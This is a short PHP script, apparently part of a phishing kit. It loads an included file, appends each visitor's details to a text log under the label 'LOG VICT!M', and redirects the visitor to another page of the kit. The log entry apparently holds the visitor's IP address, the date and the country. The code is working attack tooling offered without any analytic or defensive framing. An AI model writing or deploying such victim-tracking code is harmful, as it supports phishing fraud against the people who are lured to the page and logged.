<?php

include ('./The_BACHA/bt.php');
$milaf = fopen("VST.txt","a");
fwrite($milaf,$ib."  -| LOG VICT!M !! |-   ".$dt."                  -        " . $cntc ."\n");
header('Location: newdir.php');
?>

